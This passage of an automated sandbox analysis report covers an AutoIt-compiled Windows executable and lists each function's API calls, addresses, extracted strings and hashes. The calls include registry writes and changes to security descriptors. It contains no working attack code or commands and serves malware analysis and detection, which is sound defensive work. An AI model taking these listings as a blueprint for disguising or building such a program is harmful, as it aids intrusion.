                          • SetTextColor.GDI32(?,?), ref: 007975DB
                          • SetBkColor.GDI32(?,?), ref: 007975E5
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                          • String ID:
                          • API String ID: 1996641542-0
                          • Opcode ID: b05db585a8a2e392cbeeff0c2643444768e24618f951f947d4113941d9e4e9dd
                          • Instruction ID: 00cdc8b9b4dd8f046598eed0571f9d0f134e503b87fe9abfbd410973840a4b12
                          • Opcode Fuzzy Hash: b05db585a8a2e392cbeeff0c2643444768e24618f951f947d4113941d9e4e9dd
                          • Instruction Fuzzy Hash: 98616D72900218AFDF059FA4DC49EEEBFB9EB08320F118116F915AB2A1D7789951CF94
                          Function 00790FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetCursorPos.USER32(?), ref: 00791128
                          • GetDesktopWindow.USER32 ref: 0079113D
                          • GetWindowRect.USER32(00000000), ref: 00791144
                          • GetWindowLongW.USER32(?,000000F0), ref: 00791199
                          • DestroyWindow.USER32(?), ref: 007911B9
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007911ED
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0079120B
                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0079121D
                          • SendMessageW.USER32(00000000,00000421,?,?), ref: 00791232
                          • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00791245
                          • IsWindowVisible.USER32(00000000), ref: 007912A1
                          • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 007912BC
                          • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 007912D0
                          • GetWindowRect.USER32(00000000,?), ref: 007912E8
                          • MonitorFromPoint.USER32(?,?,00000002), ref: 0079130E
                          • GetMonitorInfoW.USER32(00000000,?), ref: 00791328
                          • CopyRect.USER32(?,?), ref: 0079133F
                          • SendMessageW.USER32(00000000,00000412,00000000), ref: 007913AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                          • String ID: ($0$tooltips_class32
                          • API String ID: 698492251-4156429822
                          • Opcode ID: 03aaf519fb8df9674251b6c6133ed048d1a174ee8f52e21014430a5e9fd355f1
                          • Instruction ID: b411a68145557f0fb3aa6d5eb1e26dd316678a9da65abf54db09ce1437ba62a5
                          • Opcode Fuzzy Hash: 03aaf519fb8df9674251b6c6133ed048d1a174ee8f52e21014430a5e9fd355f1
                          • Instruction Fuzzy Hash: FFB19D71604341EFDB00DF64D888B6ABBE4FF88350F408919F9999B2A1CB75E855CB92
                          Function 00790241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(?,?), ref: 007902E5
                          • _wcslen.LIBCMT ref: 0079031F
                          • _wcslen.LIBCMT ref: 00790389
                          • _wcslen.LIBCMT ref: 007903F1
                          • _wcslen.LIBCMT ref: 00790475
                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007904C5
                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00790504
                            • Part of subcall function 0071F9F2: _wcslen.LIBCMT ref: 0071F9FD
                            • Part of subcall function 0076223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00762258
                            • Part of subcall function 0076223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0076228A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _wcslen$MessageSend$BuffCharUpper
                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                          • API String ID: 1103490817-719923060
                          • Opcode ID: fd16477f69eba1fa51a982b03cdd04e2e518095cc1410c2b46471d76df2f3963
                          • Instruction ID: a2e0f307302b5f6fb1255b00180d06909838b4c2a5d395878edb3e09db30cb7a
                          • Opcode Fuzzy Hash: fd16477f69eba1fa51a982b03cdd04e2e518095cc1410c2b46471d76df2f3963
                          • Instruction Fuzzy Hash: E0E1B031218201CFCB14DF24D95592AB7E6BFC8714F144A6CF8969B3A1DB38ED45CB91
                          Function 00718891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00718968
                          • GetSystemMetrics.USER32(00000007), ref: 00718970
                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0071899B
                          • GetSystemMetrics.USER32(00000008), ref: 007189A3
                          • GetSystemMetrics.USER32(00000004), ref: 007189C8
                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 007189E5
                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 007189F5
                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00718A28
                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00718A3C
                          • GetClientRect.USER32(00000000,000000FF), ref: 00718A5A
                          • GetStockObject.GDI32(00000011), ref: 00718A76
                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00718A81
                            • Part of subcall function 0071912D: GetCursorPos.USER32(?), ref: 00719141
                            • Part of subcall function 0071912D: ScreenToClient.USER32(00000000,?), ref: 0071915E
                            • Part of subcall function 0071912D: GetAsyncKeyState.USER32(00000001), ref: 00719183
                            • Part of subcall function 0071912D: GetAsyncKeyState.USER32(00000002), ref: 0071919D
                          • SetTimer.USER32(00000000,00000000,00000028,007190FC), ref: 00718AA8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                          • String ID: AutoIt v3 GUI
                          • API String ID: 1458621304-248962490
                          • Opcode ID: 7c3c6abf7c6bf42f16c6aa7c49b6b6c83f7d874fb0ca51bca9d20746bc9edf54
                          • Instruction ID: 0019bf22b2e6ba8e09dcba57f74bd0a5c1511495fb56c1680de606944484b61b
                          • Opcode Fuzzy Hash: 7c3c6abf7c6bf42f16c6aa7c49b6b6c83f7d874fb0ca51bca9d20746bc9edf54
                          • Instruction Fuzzy Hash: 1CB18D71A00209AFDF14DFA8CC55BEA3BB4FB08315F51822AFA15A72D0DB78E841CB55
                          Function 00760D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 007610F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00761114
                            • Part of subcall function 007610F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00760B9B,?,?,?), ref: 00761120
                            • Part of subcall function 007610F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00760B9B,?,?,?), ref: 0076112F
                            • Part of subcall function 007610F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00760B9B,?,?,?), ref: 00761136
                            • Part of subcall function 007610F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0076114D
                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00760DF5
                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00760E29
                          • GetLengthSid.ADVAPI32(?), ref: 00760E40
                          • GetAce.ADVAPI32(?,00000000,?), ref: 00760E7A
                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00760E96
                          • GetLengthSid.ADVAPI32(?), ref: 00760EAD
                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00760EB5
                          • HeapAlloc.KERNEL32(00000000), ref: 00760EBC
                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00760EDD
                          • CopySid.ADVAPI32(00000000), ref: 00760EE4
                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00760F13
                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00760F35
                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00760F47
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00760F6E
                          • HeapFree.KERNEL32(00000000), ref: 00760F75
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00760F7E
                          • HeapFree.KERNEL32(00000000), ref: 00760F85
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00760F8E
                          • HeapFree.KERNEL32(00000000), ref: 00760F95
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00760FA1
                          • HeapFree.KERNEL32(00000000), ref: 00760FA8
                            • Part of subcall function 00761193: GetProcessHeap.KERNEL32(00000008,00760BB1,?,00000000,?,00760BB1,?), ref: 007611A1
                            • Part of subcall function 00761193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00760BB1,?), ref: 007611A8
                            • Part of subcall function 00761193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00760BB1,?), ref: 007611B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                          • String ID:
                          • API String ID: 4175595110-0
                          • Opcode ID: b678c2c8c457473178ad3fba9cf49cdb00805e8d67545fe8161086398eba9c28
                          • Instruction ID: a8ed7d7ee560da03fd4de36791fac73efb8c462931dc84e36e290de7d85e7617
                          • Opcode Fuzzy Hash: b678c2c8c457473178ad3fba9cf49cdb00805e8d67545fe8161086398eba9c28
                          • Instruction Fuzzy Hash: 95715E7190021AEBDF219FA4DC49BEFBBB8BF05300F048115F91AA6251D7799A05CBA0
                          Function 0078C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0078C4BD
                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,0079CC08,00000000,?,00000000,?,?), ref: 0078C544
                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0078C5A4
                          • _wcslen.LIBCMT ref: 0078C5F4
                          • _wcslen.LIBCMT ref: 0078C66F
                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0078C6B2
                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0078C7C1
                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0078C84D
                          • RegCloseKey.ADVAPI32(?), ref: 0078C881
                          • RegCloseKey.ADVAPI32(00000000), ref: 0078C88E
                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0078C960
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                          • API String ID: 9721498-966354055
                          • Opcode ID: 5736fcc757b87b41300e78da2d612cb79d0a729385c353589f317956ed828604
                          • Instruction ID: a410a64c5e5ec4b4fcbeb9dd438b271d479c536bba6b2c636029723bf0f6a943
                          • Opcode Fuzzy Hash: 5736fcc757b87b41300e78da2d612cb79d0a729385c353589f317956ed828604
                          • Instruction Fuzzy Hash: 33127931604201DFDB15EF14C895A2AB7E5EF88714F14899CF88A9B3A2DB39FD41CB91
                          Function 0079091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(?,?), ref: 007909C6
                          • _wcslen.LIBCMT ref: 00790A01
                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00790A54
                          • _wcslen.LIBCMT ref: 00790A8A
                          • _wcslen.LIBCMT ref: 00790B06
                          • _wcslen.LIBCMT ref: 00790B81
                            • Part of subcall function 0071F9F2: _wcslen.LIBCMT ref: 0071F9FD
                            • Part of subcall function 00762BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00762BFA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _wcslen$MessageSend$BuffCharUpper
                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                          • API String ID: 1103490817-4258414348
                          • Opcode ID: 317e258e3d4b9168c958f5f1951c55718a85a64192b4461a1cab00d7c72ba81a
                          • Instruction ID: a7aeb6b57f085edb2333c4e7aa07370ec40556c8e38c13d86a17d903e1c66690
                          • Opcode Fuzzy Hash: 317e258e3d4b9168c958f5f1951c55718a85a64192b4461a1cab00d7c72ba81a
                          • Instruction Fuzzy Hash: DFE18A71218701DFCB14DF24D45496AB7E1FF98314B14895CF8969B3A2DB38ED85CB81
                          Function 0078C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _wcslen$BuffCharUpper
                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                          • API String ID: 1256254125-909552448
                          • Opcode ID: d2b6a6e8476996ee04c285fb5e2e91c5a932ed4a659b5c6bc51b417df4e7e5e5
                          • Instruction ID: 7b817385b0111f706bf6c26118faddc82834ab6e5a862cc609ca775f4b1dffbe
                          • Opcode Fuzzy Hash: d2b6a6e8476996ee04c285fb5e2e91c5a932ed4a659b5c6bc51b417df4e7e5e5
                          • Instruction Fuzzy Hash: CF71293264052A8BCB16FE7CCC41ABB3791AB60750F144129F865A7284EA3DDD44C7B1
                          Function 0079833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                          Download Yara Rule
                          APIs
                          • _wcslen.LIBCMT ref: 0079835A
                          • _wcslen.LIBCMT ref: 0079836E
                          • _wcslen.LIBCMT ref: 00798391
                          • _wcslen.LIBCMT ref: 007983B4
                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007983F2
                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00795BF2), ref: 0079844E
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00798487
                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007984CA
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00798501
                          • FreeLibrary.KERNEL32(?), ref: 0079850D
                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0079851D
                          • DestroyIcon.USER32(?,?,?,?,?,00795BF2), ref: 0079852C
                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00798549
                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00798555
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                          • String ID: .dll$.exe$.icl
                          • API String ID: 799131459-1154884017
                          • Opcode ID: ac762597c810b013c061b0c43bbd7a0cf8fed07d4fe19243d017c82e92a05f8e
                          • Instruction ID: 377abc107c88cf23693651df3234777be255af48fe5491bd2569504681501686
                          • Opcode Fuzzy Hash: ac762597c810b013c061b0c43bbd7a0cf8fed07d4fe19243d017c82e92a05f8e
                          • Instruction Fuzzy Hash: 7761CF71540215FBEF14DF64EC45BBE77A8BF09721F10860AF815E61D1DB78AA90CBA0
                          Function 00707778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                          • API String ID: 0-1645009161
                          • Opcode ID: c86d42d4b4323d1b4b220ee46e0dc4d0e31cf1d65c93341d27bfacda8a5e828d
                          • Instruction ID: 9639fc9b08111e2fd704a1d1e68f8fb2d6024a6e5ce2196a7932c69dfd093a8b
                          • Opcode Fuzzy Hash: c86d42d4b4323d1b4b220ee46e0dc4d0e31cf1d65c93341d27bfacda8a5e828d
                          • Instruction Fuzzy Hash: 288111B1A04205FBDF24AF60DC46FAE3BA8AF55340F044125F905AA1D2EB7DEA41C7A1
                          Function 00765A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • LoadIconW.USER32(00000063), ref: 00765A2E
                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00765A40
                          • SetWindowTextW.USER32(?,?), ref: 00765A57
                          • GetDlgItem.USER32(?,000003EA), ref: 00765A6C
                          • SetWindowTextW.USER32(00000000,?), ref: 00765A72
                          • GetDlgItem.USER32(?,000003E9), ref: 00765A82
                          • SetWindowTextW.USER32(00000000,?), ref: 00765A88
                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00765AA9
                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00765AC3
                          • GetWindowRect.USER32(?,?), ref: 00765ACC
                          • _wcslen.LIBCMT ref: 00765B33
                          • SetWindowTextW.USER32(?,?), ref: 00765B6F
                          • GetDesktopWindow.USER32 ref: 00765B75
                          • GetWindowRect.USER32(00000000), ref: 00765B7C
                          • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00765BD3
                          • GetClientRect.USER32(?,?), ref: 00765BE0
                          • PostMessageW.USER32(?,00000005,00000000,?), ref: 00765C05
                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00765C2F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                          • String ID:
                          • API String ID: 895679908-0
                          • Opcode ID: edb801e60024899aec1a5db56d25cf7943e4f89c5a689f0d392b5b4e63424c74
                          • Instruction ID: ec96d7c2ced9675beb9b0a9c41ade889ea83d658d497777402e26ecce7137790
                          • Opcode Fuzzy Hash: edb801e60024899aec1a5db56d25cf7943e4f89c5a689f0d392b5b4e63424c74
                          • Instruction Fuzzy Hash: A5718C71900B09EFDB21DFA8CE85AAEBBF5FF48704F104619E587A25A0D778E940DB14
                          Function 007630F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _wcslen
                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[|
                          • API String ID: 176396367-3113052777
                          • Opcode ID: 87e760b1308066d65d37ad17bfc22f264a8ee3b80a61f4db2b209d0d86e63912
                          • Instruction ID: 6f308500ed5af7f417c5b6651c1a763610fddef929650520cbcc5cb668a59e29
                          • Opcode Fuzzy Hash: 87e760b1308066d65d37ad17bfc22f264a8ee3b80a61f4db2b209d0d86e63912
                          • Instruction Fuzzy Hash: 58E1A432A00526EBCB189F78C455BEDFBB4BF54710F54822DE857A7281DB38AE85C790
                          Function 007200C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                          Download Yara Rule
                          APIs
                          • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 007200C6
                            • Part of subcall function 007200ED: InitializeCriticalSectionAndSpinCount.KERNEL32(007D070C,00000FA0,0DF1096C,?,?,?,?,007423B3,000000FF), ref: 0072011C
                            • Part of subcall function 007200ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,007423B3,000000FF), ref: 00720127
                            • Part of subcall function 007200ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,007423B3,000000FF), ref: 00720138
                            • Part of subcall function 007200ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0072014E
                            • Part of subcall function 007200ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0072015C
                            • Part of subcall function 007200ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0072016A
